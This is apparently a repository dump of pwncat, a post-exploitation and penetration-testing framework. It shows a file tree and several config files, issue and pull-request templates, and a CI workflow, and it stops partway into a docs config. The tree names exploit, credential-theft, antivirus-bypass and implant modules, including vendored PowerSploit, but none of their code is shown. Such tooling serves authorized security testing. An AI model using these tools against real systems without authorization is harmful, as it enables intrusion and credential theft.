├── .dockerignore
├── .flake8
├── .gitattributes
├── .github
├── ISSUE_TEMPLATE
│ ├── bug_report.md
│ └── feature_request.md
├── PULL_REQUEST_TEMPLATE
│ ├── bug_fix.md
│ ├── feature.md
│ └── module.md
├── pull_request_template.md
└── workflows
│ ├── publish.yml
│ └── python.yml
├── .gitignore
├── .readthedocs.yaml
├── CHANGELOG.md
├── CONTRIBUTING.md
├── Dockerfile
├── IDEAS.md
├── LICENSE.md
├── README.md
├── data
├── dirtycow
│ ├── dirtycow.c
│ └── mini_dirtycow.c
├── pwncat
├── pwncat.pub
└── pwncatrc
├── db
└── .gitkeep
├── docs
├── .gitignore
├── Makefile
├── apidoc
│ ├── module.rst_t
│ ├── package.rst_t
│ ├── package.rst_t.bak
│ └── toc.rst_t
├── make.bat
├── rebuild_api_docs.sh
└── source
│ ├── api
│ ├── pwncat.channel.rst
│ ├── pwncat.commands.rst
│ ├── pwncat.config.rst
│ ├── pwncat.db.rst
│ ├── pwncat.facts.ability.rst
│ ├── pwncat.facts.implant.rst
│ ├── pwncat.facts.linux.rst
│ ├── pwncat.facts.rst
│ ├── pwncat.facts.tamper.rst
│ ├── pwncat.facts.windows.rst
│ ├── pwncat.gtfobins.rst
│ ├── pwncat.manager.rst
│ ├── pwncat.modules.enumerate.rst
│ ├── pwncat.modules.implant.rst
│ ├── pwncat.modules.rst
│ ├── pwncat.platform.linux.rst
│ ├── pwncat.platform.rst
│ ├── pwncat.platform.windows.rst
│ ├── pwncat.rst
│ ├── pwncat.subprocess.rst
│ ├── pwncat.target.rst
│ └── pwncat.util.rst
│ ├── commands
│ ├── alias.rst
│ ├── back.rst
│ ├── bind.rst
│ ├── connect.rst
│ ├── download.rst
│ ├── escalate.rst
│ ├── index.rst
│ ├── info.rst
│ ├── lcd.rst
│ ├── listen.rst
│ ├── listeners.rst
│ ├── load.rst
│ ├── lpwd.rst
│ ├── run.rst
│ ├── search.rst
│ ├── upload.rst
│ └── use.rst
│ ├── conf.py
│ ├── configuration.rst
│ ├── enum.rst
│ ├── index.rst
│ ├── installation.rst
│ ├── modules.rst
│ ├── persist.rst
│ ├── privesc.rst
│ ├── usage.rst
│ └── windows.rst
├── poetry.lock
├── pwncat
├── __init__.py
├── __main__.py
├── channel
│ ├── __init__.py
│ ├── bind.py
│ ├── connect.py
│ ├── socket.py
│ ├── ssh.py
│ ├── ssl_bind.py
│ └── ssl_connect.py
├── commands
│ ├── __init__.py
│ ├── alias.py
│ ├── back.py
│ ├── bind.py
│ ├── connect.py
│ ├── download.py
│ ├── escalate.py
│ ├── exit.py
│ ├── help.py
│ ├── info.py
│ ├── lcd.py
│ ├── leave.py
│ ├── listener_new.py
│ ├── listeners.py
│ ├── load.py
│ ├── local.py
│ ├── lpwd.py
│ ├── reset.py
│ ├── run.py
│ ├── search.py
│ ├── sessions.py
│ ├── set.py
│ ├── shortcut.py
│ ├── upload.py
│ └── use.py
├── config.py
├── data
│ ├── PowerSploit
│ │ ├── .gitignore
│ │ ├── AntivirusBypass
│ │ │ ├── AntivirusBypass.psd1
│ │ │ ├── AntivirusBypass.psm1
│ │ │ ├── Find-AVSignature.ps1
│ │ │ └── Usage.md
│ │ ├── CodeExecution
│ │ │ ├── CodeExecution.psd1
│ │ │ ├── CodeExecution.psm1
│ │ │ ├── Invoke-DllInjection.ps1
│ │ │ ├── Invoke-ReflectivePEInjection.ps1
│ │ │ ├── Invoke-ReflectivePEInjection_Resources
│ │ │ │ ├── DemoDLL
│ │ │ │ │ ├── DemoDLL.sln
│ │ │ │ │ └── DemoDLL
│ │ │ │ │ │ ├── DemoDLL.cpp
│ │ │ │ │ │ ├── DemoDLL.h
│ │ │ │ │ │ ├── DemoDLL.vcxproj
│ │ │ │ │ │ ├── DemoDLL.vcxproj.filters
│ │ │ │ │ │ ├── ReadMe.txt
│ │ │ │ │ │ ├── dllmain.cpp
│ │ │ │ │ │ ├── stdafx.cpp
│ │ │ │ │ │ ├── stdafx.h
│ │ │ │ │ │ └── targetver.h
│ │ │ │ ├── DemoDLL_RemoteProcess
│ │ │ │ │ ├── DemoDLL_RemoteProcess.sln
│ │ │ │ │ └── DemoDLL_RemoteProcess
│ │ │ │ │ │ ├── DemoDLL_RemoteProcess.cpp
│ │ │ │ │ │ ├── DemoDLL_RemoteProcess.vcxproj
│ │ │ │ │ │ ├── DemoDLL_RemoteProcess.vcxproj.filters
│ │ │ │ │ │ ├── ReadMe.txt
│ │ │ │ │ │ ├── dllmain.cpp
│ │ │ │ │ │ ├── stdafx.cpp
│ │ │ │ │ │ ├── stdafx.h
│ │ │ │ │ │ └── targetver.h
│ │ │ │ ├── DemoExe
│ │ │ │ │ ├── DemoExe.sln
│ │ │ │ │ ├── DemoExe_MD
│ │ │ │ │ │ ├── DemoExe_MD.cpp
│ │ │ │ │ │ ├── DemoExe_MD.vcxproj
│ │ │ │ │ │ ├── DemoExe_MD.vcxproj.filters
│ │ │ │ │ │ ├── ReadMe.txt
│ │ │ │ │ │ ├── stdafx.cpp
│ │ │ │ │ │ ├── stdafx.h
│ │ │ │ │ │ └── targetver.h
│ │ │ │ │ └── DemoExe_MDd
│ │ │ │ │ │ ├── DemoExe_MDd.cpp
│ │ │ │ │ │ ├── DemoExe_MDd.vcxproj
│ │ │ │ │ │ ├── DemoExe_MDd.vcxproj.filters
│ │ │ │ │ │ ├── ReadMe.txt
│ │ │ │ │ │ ├── stdafx.cpp
│ │ │ │ │ │ ├── stdafx.h
│ │ │ │ │ │ └── targetver.h
│ │ │ │ ├── ExeToInjectInTo
│ │ │ │ │ ├── ExeToInjectInTo.sln
│ │ │ │ │ └── ExeToInjectInTo
│ │ │ │ │ │ ├── ExeToInjectInTo.cpp
│ │ │ │ │ │ ├── ExeToInjectInTo.vcxproj
│ │ │ │ │ │ ├── ExeToInjectInTo.vcxproj.filters
│ │ │ │ │ │ ├── ReadMe.txt
│ │ │ │ │ │ ├── stdafx.cpp
│ │ │ │ │ │ ├── stdafx.h
│ │ │ │ │ │ └── targetver.h
│ │ │ │ └── Shellcode
│ │ │ │ │ ├── readme.txt
│ │ │ │ │ ├── x64
│ │ │ │ │ ├── CallDllMain.asm
│ │ │ │ │ ├── ExitThread.asm
│ │ │ │ │ ├── GetFuncAddress.asm
│ │ │ │ │ └── LoadLibraryA.asm
│ │ │ │ │ └── x86
│ │ │ │ │ ├── CallDllMain.asm
│ │ │ │ │ ├── ExitThread.asm
│ │ │ │ │ └── GetProcAddress.asm
│ │ │ ├── Invoke-Shellcode.ps1
│ │ │ ├── Invoke-WmiCommand.ps1
│ │ │ └── Usage.md
│ │ ├── Exfiltration
│ │ │ ├── Exfiltration.psd1
│ │ │ ├── Exfiltration.psm1
│ │ │ ├── Get-GPPAutologon.ps1
│ │ │ ├── Get-GPPPassword.ps1
│ │ │ ├── Get-Keystrokes.ps1
│ │ │ ├── Get-MicrophoneAudio.ps1
│ │ │ ├── Get-TimedScreenshot.ps1
│ │ │ ├── Get-VaultCredential.ps1
│ │ │ ├── Get-VaultCredential.ps1xml
│ │ │ ├── Invoke-CredentialInjection.ps1
│ │ │ ├── Invoke-Mimikatz.ps1
│ │ │ ├── Invoke-NinjaCopy.ps1
│ │ │ ├── Invoke-TokenManipulation.ps1
│ │ │ ├── LogonUser
│ │ │ │ └── LogonUser
│ │ │ │ │ ├── LogonUser.sln
│ │ │ │ │ ├── LogonUser
│ │ │ │ │ ├── LogonUser.cpp
│ │ │ │ │ ├── LogonUser.vcxproj
│ │ │ │ │ ├── LogonUser.vcxproj.filters
│ │ │ │ │ ├── ReadMe.txt
│ │ │ │ │ ├── stdafx.cpp
│ │ │ │ │ ├── stdafx.h
│ │ │ │ │ └── targetver.h
│ │ │ │ │ └── logon
│ │ │ │ │ ├── ReadMe.txt
│ │ │ │ │ ├── dllmain.cpp
│ │ │ │ │ ├── logon.cpp
│ │ │ │ │ ├── logon.vcxproj
│ │ │ │ │ ├── logon.vcxproj.filters
│ │ │ │ │ ├── stdafx.cpp
│ │ │ │ │ ├── stdafx.h
│ │ │ │ │ └── targetver.h
│ │ │ ├── NTFSParser
│ │ │ │ ├── NTFSParser.sln
│ │ │ │ ├── NTFSParser
│ │ │ │ │ ├── NTFS.h
│ │ │ │ │ ├── NTFSParser.cpp
│ │ │ │ │ ├── NTFSParser.vcxproj
│ │ │ │ │ ├── NTFSParser.vcxproj.filters
│ │ │ │ │ ├── NTFS_Attribute.h
│ │ │ │ │ ├── NTFS_Common.h
│ │ │ │ │ ├── NTFS_DataType.h
│ │ │ │ │ ├── NTFS_FileRecord.h
│ │ │ │ │ ├── ReadMe.txt
│ │ │ │ │ ├── stdafx.cpp
│ │ │ │ │ ├── stdafx.h
│ │ │ │ │ └── targetver.h
│ │ │ │ └── NTFSParserDLL
│ │ │ │ │ ├── NTFS.h
│ │ │ │ │ ├── NTFSParserDLL.cpp
│ │ │ │ │ ├── NTFSParserDLL.vcxproj
│ │ │ │ │ ├── NTFSParserDLL.vcxproj.filters
│ │ │ │ │ ├── NTFS_Attribute.h
│ │ │ │ │ ├── NTFS_Common.h
│ │ │ │ │ ├── NTFS_DataType.h
│ │ │ │ │ ├── NTFS_FileRecord.h
│ │ │ │ │ ├── ReadMe.txt
│ │ │ │ │ ├── dllmain.cpp
│ │ │ │ │ ├── stdafx.cpp
│ │ │ │ │ ├── stdafx.h
│ │ │ │ │ └── targetver.h
│ │ │ ├── Out-Minidump.ps1
│ │ │ ├── Usage.md
│ │ │ └── VolumeShadowCopyTools.ps1
│ │ ├── LICENSE
│ │ ├── Mayhem
│ │ │ ├── Mayhem.psd1
│ │ │ ├── Mayhem.psm1
│ │ │ └── Usage.md
│ │ ├── Persistence
│ │ │ ├── Persistence.psd1
│ │ │ ├── Persistence.psm1
│ │ │ └── Usage.md
│ │ ├── PowerSploit.psd1
│ │ ├── PowerSploit.psm1
│ │ ├── PowerSploit.pssproj
│ │ ├── PowerSploit.sln
│ │ ├── Privesc
│ │ │ ├── Get-System.ps1
│ │ │ ├── PowerUp.ps1
│ │ │ ├── Privesc.psd1
│ │ │ ├── Privesc.psm1
│ │ │ └── README.md
│ │ ├── README.md
│ │ ├── Recon
│ │ │ ├── Dictionaries
│ │ │ │ ├── admin.txt
│ │ │ │ ├── generic.txt
│ │ │ │ └── sharepoint.txt
│ │ │ ├── Get-ComputerDetail.ps1
│ │ │ ├── Get-HttpStatus.ps1
│ │ │ ├── Invoke-CompareAttributesForClass.ps1
│ │ │ ├── Invoke-Portscan.ps1
│ │ │ ├── Invoke-ReverseDnsLookup.ps1
│ │ │ ├── PowerView.ps1
│ │ │ ├── README.md
│ │ │ ├── Recon.psd1
│ │ │ └── Recon.psm1
│ │ ├── ScriptModification
│ │ │ ├── Out-CompressedDll.ps1
│ │ │ ├── Out-EncodedCommand.ps1
│ │ │ ├── Out-EncryptedScript.ps1
│ │ │ ├── Remove-Comment.ps1
│ │ │ ├── ScriptModification.psd1
│ │ │ ├── ScriptModification.psm1
│ │ │ └── Usage.md
│ │ ├── Tests
│ │ │ ├── CodeExecution.tests.ps1
│ │ │ ├── Exfiltration.tests.ps1
│ │ │ ├── PowerSploit.tests.ps1
│ │ │ ├── Privesc.tests.ps1
│ │ │ └── Recon.tests.ps1
│ │ ├── docs
│ │ │ ├── AntivirusBypass
│ │ │ │ └── Find-AVSignature.md
│ │ │ ├── CodeExecution
│ │ │ │ ├── Invoke-DllInjection.md
│ │ │ │ ├── Invoke-ReflectivePEInjection.md
│ │ │ │ ├── Invoke-Shellcode.md
│ │ │ │ └── Invoke-WmiCommand.md
│ │ │ ├── Mayhem
│ │ │ │ ├── Set-CriticalProcess.md
│ │ │ │ └── Set-MasterBootRecord.md
│ │ │ ├── Persistence
│ │ │ │ ├── Add-Persistence.md
│ │ │ │ ├── Get-SecurityPackage.md
│ │ │ │ ├── Install-SSP.md
│ │ │ │ ├── New-ElevatedPersistenceOption.md
│ │ │ │ └── New-UserPersistenceOption.md
│ │ │ ├── Privesc
│ │ │ │ ├── Add-ServiceDacl.md
│ │ │ │ ├── Enable-Privilege.md
│ │ │ │ ├── Find-PathDLLHijack.md
│ │ │ │ ├── Find-ProcessDLLHijack.md
│ │ │ │ ├── Get-ApplicationHost.md
│ │ │ │ ├── Get-CachedGPPPassword.md
│ │ │ │ ├── Get-ModifiablePath.md
│ │ │ │ ├── Get-ModifiableRegistryAutoRun.md
│ │ │ │ ├── Get-ModifiableScheduledTaskFile.md
│ │ │ │ ├── Get-ModifiableService.md
│ │ │ │ ├── Get-ModifiableServiceFile.md
│ │ │ │ ├── Get-ProcessTokenGroup.md
│ │ │ │ ├── Get-ProcessTokenPrivilege.md
│ │ │ │ ├── Get-RegistryAlwaysInstallElevated.md
│ │ │ │ ├── Get-RegistryAutoLogon.md
│ │ │ │ ├── Get-ServiceDetail.md
│ │ │ │ ├── Get-SiteListPassword.md
│ │ │ │ ├── Get-System.md
│ │ │ │ ├── Get-UnattendedInstallFile.md
│ │ │ │ ├── Get-UnquotedService.md
│ │ │ │ ├── Get-WebConfig.md
│ │ │ │ ├── Install-ServiceBinary.md
│ │ │ │ ├── Invoke-PrivescAudit.md
│ │ │ │ ├── Invoke-ServiceAbuse.md
│ │ │ │ ├── Invoke-WScriptUACBypass.md
│ │ │ │ ├── Restore-ServiceBinary.md
│ │ │ │ ├── Set-ServiceBinaryPath.md
│ │ │ │ ├── Test-ServiceDaclPermission.md
│ │ │ │ ├── Write-HijackDll.md
│ │ │ │ ├── Write-ServiceBinary.md
│ │ │ │ ├── Write-UserAddMSI.md
│ │ │ │ └── index.md
│ │ │ ├── Recon
│ │ │ │ ├── Add-DomainGroupMember.md
│ │ │ │ ├── Add-DomainObjectAcl.md
│ │ │ │ ├── Add-RemoteConnection.md
│ │ │ │ ├── Convert-ADName.md
│ │ │ │ ├── ConvertFrom-SID.md
│ │ │ │ ├── ConvertFrom-UACValue.md
│ │ │ │ ├── ConvertTo-SID.md
│ │ │ │ ├── Export-PowerViewCSV.md
│ │ │ │ ├── Find-DomainLocalGroupMember.md
│ │ │ │ ├── Find-DomainObjectPropertyOutlier.md
│ │ │ │ ├── Find-DomainProcess.md
│ │ │ │ ├── Find-DomainShare.md
│ │ │ │ ├── Find-DomainUserEvent.md
│ │ │ │ ├── Find-DomainUserLocation.md
│ │ │ │ ├── Find-InterestingDomainAcl.md
│ │ │ │ ├── Find-InterestingDomainShareFile.md
│ │ │ │ ├── Find-InterestingFile.md
│ │ │ │ ├── Find-LocalAdminAccess.md
│ │ │ │ ├── Get-ComputerDetail.md
│ │ │ │ ├── Get-Domain.md
│ │ │ │ ├── Get-DomainComputer.md
│ │ │ │ ├── Get-DomainController.md
│ │ │ │ ├── Get-DomainDFSShare.md
│ │ │ │ ├── Get-DomainDNSRecord.md
│ │ │ │ ├── Get-DomainDNSZone.md
│ │ │ │ ├── Get-DomainFileServer.md
│ │ │ │ ├── Get-DomainForeignGroupMember.md
│ │ │ │ ├── Get-DomainForeignUser.md
│ │ │ │ ├── Get-DomainGPO.md
│ │ │ │ ├── Get-DomainGPOComputerLocalGroupMapping.md
│ │ │ │ ├── Get-DomainGPOLocalGroup.md
│ │ │ │ ├── Get-DomainGPOUserLocalGroupMapping.md
│ │ │ │ ├── Get-DomainGroup.md
│ │ │ │ ├── Get-DomainGroupMember.md
│ │ │ │ ├── Get-DomainManagedSecurityGroup.md
│ │ │ │ ├── Get-DomainOU.md
│ │ │ │ ├── Get-DomainObject.md
│ │ │ │ ├── Get-DomainObjectAcl.md
│ │ │ │ ├── Get-DomainPolicy.md
│ │ │ │ ├── Get-DomainSID.md
│ │ │ │ ├── Get-DomainSPNTicket.md
│ │ │ │ ├── Get-DomainSite.md
│ │ │ │ ├── Get-DomainSubnet.md
│ │ │ │ ├── Get-DomainTrust.md
│ │ │ │ ├── Get-DomainTrustMapping.md
│ │ │ │ ├── Get-DomainUser.md
│ │ │ │ ├── Get-DomainUserEvent.md
│ │ │ │ ├── Get-Forest.md
│ │ │ │ ├── Get-ForestDomain.md
│ │ │ │ ├── Get-ForestGlobalCatalog.md
│ │ │ │ ├── Get-ForestTrust.md
│ │ │ │ ├── Get-HttpStatus.md
│ │ │ │ ├── Get-NetComputerSiteName.md
│ │ │ │ ├── Get-NetLocalGroup.md
│ │ │ │ ├── Get-NetLocalGroupMember.md
│ │ │ │ ├── Get-NetLoggedon.md
│ │ │ │ ├── Get-NetRDPSession.md
│ │ │ │ ├── Get-NetSession.md
│ │ │ │ ├── Get-NetShare.md
│ │ │ │ ├── Get-PathAcl.md
│ │ │ │ ├── Get-RegLoggedOn.md
│ │ │ │ ├── Get-WMIProcess.md
│ │ │ │ ├── Get-WMIRegCachedRDPConnection.md
│ │ │ │ ├── Get-WMIRegLastLoggedOn.md
│ │ │ │ ├── Get-WMIRegMountedDrive.md
│ │ │ │ ├── Get-WMIRegProxy.md
│ │ │ │ ├── Invoke-Kerberoast.md
│ │ │ │ ├── Invoke-Portscan.md
│ │ │ │ ├── Invoke-ReverseDnsLookup.md
│ │ │ │ ├── Invoke-RevertToSelf.md
│ │ │ │ ├── Invoke-UserImpersonation.md
│ │ │ │ ├── New-DomainGroup.md
│ │ │ │ ├── New-DomainUser.md
│ │ │ │ ├── Remove-RemoteConnection.md
│ │ │ │ ├── Resolve-IPAddress.md
│ │ │ │ ├── Set-DomainObject.md
│ │ │ │ ├── Set-DomainObjectOwner.md
│ │ │ │ ├── Set-DomainUserPassword.md
│ │ │ │ ├── Test-AdminAccess.md
│ │ │ │ └── index.md
│ │ │ ├── ScriptModification
│ │ │ │ ├── Out-CompressedDll.md
│ │ │ │ ├── Out-EncodedCommand.md
│ │ │ │ ├── Out-EncryptedScript.md
│ │ │ │ └── Remove-Comment.md
│ │ │ └── index.md
│ │ └── mkdocs.yml
│ ├── gtfobins.json
│ ├── lester.json
│ ├── loader.dll
│ ├── pam.c
│ ├── reports
│ │ ├── generic.md
│ │ ├── linux.md
│ │ └── windows.md
│ └── stagetwo.dll
├── db.py
├── facts
│ ├── __init__.py
│ ├── ability.py
│ ├── implant.py
│ ├── linux.py
│ ├── tamper.py
│ └── windows.py
├── gtfobins.py
├── manager.py
├── modules
│ ├── __init__.py
│ ├── agnostic
│ │ ├── __init__.py
│ │ ├── clean.py
│ │ ├── enumerate
│ │ │ ├── __init__.py
│ │ │ ├── ability.py
│ │ │ ├── escalate
│ │ │ │ ├── __init__.py
│ │ │ │ ├── implant.py
│ │ │ │ └── replace.py
│ │ │ └── gather.py
│ │ ├── implant.py
│ │ └── report.py
│ ├── enumerate.py
│ ├── implant.py
│ ├── linux
│ │ ├── __init__.py
│ │ ├── enumerate
│ │ │ ├── __init__.py
│ │ │ ├── creds
│ │ │ │ ├── __init__.py
│ │ │ │ ├── pam.py
│ │ │ │ ├── password.py
│ │ │ │ └── private_key.py
│ │ │ ├── escalate
│ │ │ │ ├── __init__.py
│ │ │ │ ├── append_passwd.py
│ │ │ │ ├── leak_privkey.py
│ │ │ │ └── write_authorized_keys.py
│ │ │ ├── file
│ │ │ │ ├── __init__.py
│ │ │ │ ├── caps.py
│ │ │ │ └── suid.py
│ │ │ ├── misc
│ │ │ │ ├── __init__.py
│ │ │ │ └── writable_path.py
│ │ │ ├── software
│ │ │ │ ├── __init__.py
│ │ │ │ ├── cron.py
│ │ │ │ ├── screen
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ └── cve_2017_5618.py
│ │ │ │ └── sudo
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── cve_2019_14287.py
│ │ │ │ │ ├── rules.py
│ │ │ │ │ └── version.py
│ │ │ ├── system
│ │ │ │ ├── __init__.py
│ │ │ │ ├── aslr.py
│ │ │ │ ├── container.py
│ │ │ │ ├── distro.py
│ │ │ │ ├── fstab.py
│ │ │ │ ├── hosts.py
│ │ │ │ ├── init.py
│ │ │ │ ├── network.py
│ │ │ │ ├── process.py
│ │ │ │ ├── selinux.py
│ │ │ │ ├── services.py
│ │ │ │ └── uname.py
│ │ │ └── user
│ │ │ │ ├── __init__.py
│ │ │ │ └── group.py
│ │ └── implant
│ │ │ ├── __init__.py
│ │ │ ├── authorized_key.py
│ │ │ ├── pam.py
│ │ │ └── passwd.py
│ └── windows
│ │ ├── __init__.py
│ │ ├── bloodhound.py
│ │ ├── enumerate
│ │ ├── __init__.py
│ │ ├── domain
│ │ │ ├── __init__.py
│ │ │ ├── computer.py
│ │ │ ├── fileserver.py
│ │ │ ├── group.py
│ │ │ ├── site.py
│ │ │ └── user.py
│ │ ├── network
│ │ │ ├── __init__.py
│ │ │ └── shares.py
│ │ ├── protections
│ │ │ ├── __init__.py
│ │ │ ├── antivirus.py
│ │ │ ├── defender.py
│ │ │ ├── lsa.py
│ │ │ └── uac.py
│ │ ├── system
│ │ │ ├── __init__.py
│ │ │ ├── alwaysinstallelevated.py
│ │ │ ├── clipboard.py
│ │ │ ├── drives.py
│ │ │ ├── environment.py
│ │ │ ├── hotfixes.py
│ │ │ ├── processes.py
│ │ │ ├── programs.py
│ │ │ └── services.py
│ │ ├── token
│ │ │ ├── __init__.py
│ │ │ ├── potato.py
│ │ │ └── privs.py
│ │ └── user
│ │ │ ├── __init__.py
│ │ │ └── group.py
│ │ ├── manage
│ │ ├── __init__.py
│ │ └── powershell
│ │ │ ├── __init__.py
│ │ │ └── import.py
│ │ └── powersploit.py
├── platform
│ ├── __init__.py
│ ├── linux.py
│ └── windows.py
├── subprocess.py
├── target.py
└── util.py
├── pwncatrc
├── pyproject.toml
├── run-tests.sh
├── test.py
└── tests
├── conftest.py
├── test_fileio.py
├── test_manager.py
├── test_platform.py
├── test_session.py
└── test_test.py
/.dockerignore:
--------------------------------------------------------------------------------
1 | data/
2 | .github/
3 | tests/
4 | docs/
5 | db/
6 | *.md
7 | *.txt
8 | *.sh
9 | test.py
10 | .flake8
11 | .gitattributes
12 | .gitignore
13 | .git/
14 | !README.md
15 |
--------------------------------------------------------------------------------
/.flake8:
--------------------------------------------------------------------------------
1 | [flake8]
2 | ignore=E501,E123,E121,E126,E133,E203,W505,W503,W504
3 | exclude=.git,__pycache__,pwncat.egg-info,env,dist,build,data,docs,tests,test.py
4 |
--------------------------------------------------------------------------------
/.gitattributes:
--------------------------------------------------------------------------------
1 | pwncat/data/PowerSploit/**/*.ps1 linguist-vendored
2 |
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/bug_report.md:
--------------------------------------------------------------------------------
1 | ---
2 | name: Bug report
3 | about: Create a report to help us improve
4 | title: ""
5 | labels: bug
6 | assignees: ''
7 | ---
8 |
9 |
12 |
13 | ## Bug Description
14 | A clear and concise description of what the bug is.
15 |
16 | ## pwncat version
17 | Provide the output of `pwncat --version` or a commit hash if working from
18 | a development branch.
19 |
20 | ```
21 | $ pwncat --version
22 | 0.4.2
23 | ```
24 |
25 | ## Target System (aka "victim")
26 | Provide as much detail about the target host as possible. If this is a TryHackMe
27 | or Hack The Box or similar machine, please provide the machine name and/or link
28 | as well.
29 |
30 | ## Steps to Reproduce
31 | Steps to reproduce the behavior:
32 | 1. Go to '...'
33 | 2. Click on '....'
34 | 3. Scroll down to '....'
35 | 4. See error
36 |
37 | ## Expected Behavior
38 | A clear and concise description of what you expected to happen.
39 |
40 | ## Screenshots
41 | If applicable, add screenshots to help explain your problem.
42 |
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/feature_request.md:
--------------------------------------------------------------------------------
1 | ---
2 | name: Feature request
3 | about: Suggest an idea for this project
4 | title: ''
5 | labels: enhancement
6 | assignees: ''
7 | ---
8 |
9 | ## Is the feature related to a problem? Please describe.
10 | A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
11 |
12 | ## Feature Description
13 | A clear and concise description of what you want to happen.
14 |
15 | ## Alternatives
16 | A clear and concise description of any alternative solutions or features you've considered.
17 |
18 | ## Additional Context
19 | Add any other context or screenshots about the feature request here.
20 |
--------------------------------------------------------------------------------
/.github/PULL_REQUEST_TEMPLATE/bug_fix.md:
--------------------------------------------------------------------------------
1 | ---
2 | name: Bug/Issue Fix
3 | about: Merge changes to fix an outstanding bug/issue
4 | title: "[FIX #XXX] "
5 | labels: fix
6 | assignees: ""
7 | ---
8 | Fixes #.
9 |
10 | Changes proposed in this pull request:
11 | -
12 | -
13 | -
14 |
15 | **Note: remove the following section before submitting, please :)**
16 |
17 | The following should be completed before opening a pull request:
18 |
19 | - `isort` any modified files.
20 | - `black` format any modified files
21 | - Correct any outstanding `flake8` errors.
22 | - Note any `noqa:` comments needed in your PR to appease flake.
23 |
24 | Include a description of your fix in the body, and enumerate any
25 | changes which could have external consequences/side-effects. Think
26 | about things like API or usage changes.
27 |
--------------------------------------------------------------------------------
/.github/PULL_REQUEST_TEMPLATE/feature.md:
--------------------------------------------------------------------------------
1 | ---
2 | name: Feature Implementation
3 | about: Merge changes to add a new feature
4 | title: "[FEATURE] "
5 | labels: enhancement
6 | assignees: ""
7 | ---
8 |
9 | Describe the changes you've made and how they improve the framework.
10 |
11 | Changes proposed in this pull request:
12 | - Enumerate high-level changes made to the framework here.
13 | - Think about how this change/feature changes the API or usage.
14 |
15 | **Note: remove the following section before submitting, please :)**
16 |
17 | The following should be completed before opening a pull request:
18 |
19 | - `isort` any modified files.
20 | - `black` format any modified files
21 | - Correct any outstanding `flake8` errors.
22 | - Note any `noqa:` comments needed to appease flake above.
23 |
--------------------------------------------------------------------------------
/.github/PULL_REQUEST_TEMPLATE/module.md:
--------------------------------------------------------------------------------
1 | ---
2 | name: New Module
3 | about: Merge changes to add a new pwncat module
4 | title: "[NEW-MODULE] "
5 | labels:
6 | - enhancement
7 | - new-module
8 | assignees: ""
9 | ---
10 |
11 | **Module Goals**
12 | *Describe in detail what your module is for, and how it accomplishes
13 | the task from a technical standpoint.*
14 |
15 | **Platform Restrictions:**
16 | *Linux/Windows/None/etc*
17 |
18 | **Fully Qualified Name:**
19 | *enumerate.something.cool*
20 |
21 | **Environment Restrictions:**
22 | *Anything that is required in the environment for the module to function*
23 |
24 | **Artifacts Generated:**
25 | *List any artifacts that this module may generate on the victim*
26 |
27 | **Tested Targets**
28 | *Where have you tested this module? What have you done to test against
29 | various distributions/systems and ensure wide coverage? Does the module
30 | behave properly (e.g. raise an appropriate exception, fail silently) if the
31 | environment doesn't match?*
32 |
33 | **Note: remove the following section before submitting, please :)**
34 |
35 | The following should be completed before opening a pull request:
36 |
37 | - `isort` any modified files.
38 | - `black` format any modified files
39 | - Correct any outstanding `flake8` errors.
40 | - Note any `noqa:` comments needed in your PR to appease flake.
41 |
--------------------------------------------------------------------------------
/.github/pull_request_template.md:
--------------------------------------------------------------------------------
1 | ## Description of Changes
2 |
3 | Fixes #XXX.
4 |
5 | **Please note any `noqa:` comments needed to appease flake8.**
6 |
7 | ## Major Changes Implemented:
8 | -
9 | -
10 | -
11 |
12 | ## Pre-Merge Tasks
13 | - [ ] Formatted all modified files w/ `python-black`
14 | - [ ] Sorted imports for modified files w/ `isort`
15 | - [ ] Ran `flake8` on repo, and fixed any new problems w/ modified files
16 | - [ ] Ran `pytest` test cases
17 | - [ ] Added brief summary of updates to CHANGELOG (under `[Unreleased]`)
18 |
19 | **For issues with pre-merge tasks, see CONTRIBUTING.md**
20 |
21 |
37 |
--------------------------------------------------------------------------------
/.github/workflows/python.yml:
--------------------------------------------------------------------------------
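1 | name: Python Checks
2 | on:
3 |   workflow_dispatch:
4 |
5 | # Least-privilege GITHUB_TOKEN: nothing in this workflow writes to the repository.
6 | permissions:
7 |   contents: read
8 |
9 | jobs:
10 |   testing:
11 |     runs-on: ubuntu-latest
12 |
13 |     strategy:
14 |       matrix:
15 |         # The key name must match the ${{ matrix.python-version }} references
16 |         # below; a mismatched key ("python-versions") leaves the expression empty.
17 |         # Quoted so YAML keeps the versions as strings.
18 |         python-version: ["3.8", "3.9"]
19 |
20 |     services:
21 |       centos:
22 |         image: calebjstewart/pwncat-testing:centos
23 |         ports:
24 |           - 4444:4444
25 |       ubuntu:
26 |         image: calebjstewart/pwncat-testing:ubuntu
27 |         ports:
28 |           - 4445:4444
29 |
30 |     steps:
31 |       # Consider pinning third-party actions to a full commit SHA rather than a
32 |       # mutable tag, so a moved tag cannot change what runs in this job.
33 |       - uses: actions/checkout@v2
34 |       - name: Set up Python ${{ matrix.python-version }}
35 |         uses: actions/setup-python@v2
36 |         with:
37 |           python-version: ${{ matrix.python-version }}
38 |       - name: Install pwncat
39 |         # The project is built from pyproject.toml (there is no requirements.txt
40 |         # or setup.py in the tree); this mirrors the Dockerfile's `pip install .`.
41 |         run: |
42 |           python -m pip install --upgrade pip
43 |           pip install flake8 pytest
44 |           pip install .
45 |       # - name: Lint with flake8
46 |       #   run: |
47 |       #     flake8
48 |       - name: Test with pytest
49 |         env:
50 |           CENTOS_HOST: "127.0.0.1"
51 |           CENTOS_BIND_PORT: "4444"
52 |           UBUNTU_HOST: "127.0.0.1"
53 |           UBUNTU_BIND_PORT: "4445"
54 |         run: |
55 |           pytest
56 |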
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | env/
2 | **/*.pyc
3 | **/__pycache__/
4 | **/*.egg-info/
5 | build/
6 | dist/
7 | .byebug_history
8 | testbed
9 | .idea/
10 | **/*.sqlite
11 | testing/
12 | data/pwncat.sqlite-journal
13 | pwncat.sqlite-journal
14 | linpeas.txt
15 | NOTES.md
16 | db/pwncat*
17 |
--------------------------------------------------------------------------------
/.readthedocs.yaml:
--------------------------------------------------------------------------------
1 | version: 2
2 |
3 | build:
4 | os: ubuntu-20.04
5 | tools:
6 | python: "3.9"
7 |
8 | sphinx:
9 | configuration: docs/source/conf.py
10 |
11 | python:
12 | install:
13 | - method: pip
14 | path: .
15 | extra_requirements:
